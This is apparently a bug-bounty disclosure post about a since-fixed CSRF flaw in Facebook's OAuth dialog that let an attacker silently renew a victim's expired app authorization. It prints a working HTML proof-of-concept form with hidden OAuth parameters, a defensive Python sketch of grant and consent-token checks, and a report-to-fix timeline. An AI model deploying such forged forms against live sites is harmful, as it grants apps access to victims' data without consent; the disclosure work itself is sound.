Thursday, December 16, 2021

Facebook Bug POC - CSRF renew access to Apps

It was possible for an attacker to renew access to Apps whose authorization had expired for the victim, without the victim's consent.

POC -

=========================================================================

=========================================================================

<html>
<!-- POC: APP_ID and APP_CALLBACK_DOMAIN are placeholders for the target app's id and its registered callback domain -->
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://www.facebook.com/v2.3/dialog/oauth">
<input type="hidden" name="app_id" value="APP_ID" />
<input type="hidden" name="auth_type" value="" />
<input type="hidden" name="cbt" value="1622970398155" />
<input type="hidden" name="channel_url" value="https://staticxx.facebook.com/x/connect/xd_arbiter/?version=46#cb=f11c70b8d77d13&amp;domain=www.APP_CALLBACK_DOMAIN.com&amp;origin=https%3A%2F%2Fwww.APP_CALLBACK_DOMAIN.com%2Ff1e7baa12b0f5a4&amp;relation=opener" />
<input type="hidden" name="client_id" value="APP_ID" />
<input type="hidden" name="display" value="popup" />
<input type="hidden" name="domain" value="www.APP_CALLBACK_DOMAIN.com" />
<input type="hidden" name="e2e" value="{}" />
<input type="hidden" name="fallback_redirect_uri" value="https://www.APP_CALLBACK_DOMAIN.com/signup?redirect=/" />
<input type="hidden" name="fx_app" value="facebook" />
<input type="hidden" name="locale" value="en_US" />
<input type="hidden" name="logger_id" value="f256cfb96281ce4" />
<input type="hidden" name="origin" value="1" />
<input type="hidden" name="redirect_uri" value="https://staticxx.facebook.com/x/connect/xd_arbiter/?version=46#cb=f232d7fd018cdac&amp;domain=www.APP_CALLBACK_DOMAIN.com&amp;origin=https%3A%2F%2Fwww.APP_CALLBACK_DOMAIN.com%2Ff1e7baa12b0f5a4&amp;relation=opener&amp;frame=f3505dbd2db68" />
<input type="hidden" name="response_type" value="token,signed_request,graph_domain" />
<input type="hidden" name="return_scopes" value="false" />
<input type="hidden" name="scope" value="public_profile,email" />
<input type="hidden" name="sdk" value="joey" />
<input type="hidden" name="version" value="v2.3" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>

=========================================================================

=========================================================================

There will be several redirects; the last one lands on a page saying "Please close this tab."

This would not have worked for Apps that had added extra permissions after the victim's original authentication.
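To make the server-side condition concrete, here is an added example (not Facebook's code and not from the original post) of the gating an OAuth authorization endpoint can apply when a browser arrives at the dialog for an app the user has approved before. The grant store, session model, consent-token scheme and sample values are constructed for the example; only the parameter names client_id and scope, the scope value public_profile,email and the APP_ID placeholder come from the PoC. It also illustrates the caveat above: a request for scopes beyond the existing grant, or against an expired grant, must fall through to the consent dialog, and the dialog's own "Allow" submission must be bound to the victim's session so it cannot be forged either.

```python
"""Illustrative OAuth authorization-endpoint gating (added example; not
Facebook's implementation).  Grant store, sessions, key and sample values
are constructed for this demonstration."""

import hashlib
import hmac
import time
from dataclasses import dataclass
from enum import Enum


class Decision(Enum):
    SILENT_REAPPROVE = "silent"   # redirect with a token, no user interaction
    PROMPT_CONSENT = "prompt"     # render the consent dialog first


@dataclass(frozen=True)
class Grant:
    app_id: str
    scopes: frozenset     # permissions the user actually approved earlier
    expires_at: float     # epoch seconds at which the grant lapsed/lapses


def parse_scope(scope_param):
    """'public_profile,email' -> frozenset({'public_profile', 'email'})"""
    return frozenset(s for s in scope_param.split(",") if s)


def decide(client_id, requested_scopes, grant, now=None):
    """A cross-site GET forged by an attacker page looks the same to the
    authorization server as a legitimate app-initiated login (both are
    cross-site navigations to /dialog/oauth), so the request itself cannot
    be trusted.  The safe rule: approve silently only when a *live* grant
    already covers every requested scope; anything else needs a click."""
    now = time.time() if now is None else now
    if grant is None or grant.app_id != client_id:
        return Decision.PROMPT_CONSENT          # never approved this app
    if not requested_scopes <= grant.scopes:
        return Decision.PROMPT_CONSENT          # app added permissions since
    if grant.expires_at <= now:
        return Decision.PROMPT_CONSENT          # expired grant: the case the PoC abused
    return Decision.SILENT_REAPPROVE


# The consent dialog must not be forgeable either, or the attacker simply
# submits the "Allow" form cross-site.  Bind its token to the session, the
# app and the exact scope set (HMAC over a server-side key).

def _consent_mac(session_key, session_id, client_id, scopes):
    msg = "|".join([session_id, client_id, ",".join(sorted(scopes))]).encode()
    return hmac.new(session_key, msg, hashlib.sha256).hexdigest()


def issue_consent_token(session_key, session_id, client_id, scopes):
    """Embedded as a hidden field when the consent dialog is rendered."""
    return _consent_mac(session_key, session_id, client_id, scopes)


def confirm_consent(session_key, session_id, client_id, scopes, token):
    """Accept the 'Allow' POST only for the session/app/scopes it was issued
    for.  A token replayed from another session or with altered scopes fails."""
    if not isinstance(token, str):
        return False
    expected = _consent_mac(session_key, session_id, client_id, scopes)
    return hmac.compare_digest(token, expected)


if __name__ == "__main__":
    # Constructed scenario: victim approved APP_ID for public_profile,email;
    # that grant expired at t=1000 and the forged request arrives at t=2000.
    scopes = parse_scope("public_profile,email")
    expired = Grant("APP_ID", scopes, expires_at=1000.0)
    live = Grant("APP_ID", scopes, expires_at=3000.0)
    print("expired grant ->", decide("APP_ID", scopes, expired, now=2000.0).value)
    print("live grant    ->", decide("APP_ID", scopes, live, now=2000.0).value)
    more = parse_scope("public_profile,email,EXTRA_PERMISSION")  # placeholder scope
    print("extra scope   ->", decide("APP_ID", more, live, now=2000.0).value)
    key = b"constructed-server-key"
    tok = issue_consent_token(key, "sess-victim", "APP_ID", scopes)
    print("victim allow  ->", confirm_consent(key, "sess-victim", "APP_ID", scopes, tok))
    print("replayed allow->", confirm_consent(key, "sess-other", "APP_ID", scopes, tok))
```

The point of `decide` is that the authorization server has no reliable signal in the request that distinguishes the PoC's form submission from a real login button, so silent re-approval can only be justified by state the server already holds (a grant that is still valid). Once that grant has expired or the scope set has grown, the user's explicit consent is the control, and `confirm_consent` keeps that control from being forged in the same way.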

Timeline -

Reported - 6 June 2021
Reproduced - 14 June 2021
Triaged - 18 June 2021
Rewarded - 8 September 2021
Fixed - 30 November 2021